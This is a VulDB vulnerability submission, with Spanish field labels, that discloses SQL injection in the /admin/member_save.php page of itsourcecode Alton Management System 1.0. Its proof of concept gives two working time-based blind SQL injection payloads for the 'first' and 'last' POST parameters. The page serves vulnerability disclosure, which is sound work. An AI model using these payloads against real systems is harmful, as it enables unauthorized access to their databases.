| Título | itsourcecode Alton Management System 1.0 member_save.php |
|---|
| Descripción | Log in as an administrator user, access the "/admin/member_save.php" page. This page can pass in the "last" and "first" parameters, both of which can lead to SQL injection vulnerabilities due to lax filtering.
-----------------POC------------------
Parameter: first (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: last=123&first=123' AND (SELECT 9651 FROM (SELECT(SLEEP(5)))LDVG) AND 'Zjoq'='Zjoq&contact=123&address=123
Parameter: last (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: last=123' AND (SELECT 9207 FROM (SELECT(SLEEP(5)))IyrR) AND 'YcaK'='YcaK&first=123&contact=123&address=123
----------------------------------------- |
|---|
| Fuente | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE8-4.md |
|---|
| Usuario | Dee.Mirage (UID 71702) |
|---|
| Sumisión | 2024-07-27 12:31 (hace 2 años) |
|---|
| Moderación | 2024-07-30 15:29 (3 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 273145 [itsourcecode Alton Management System 1.0 /admin/member_save.php last/first inyección SQL] |
|---|
| Puntos | 20 |
|---|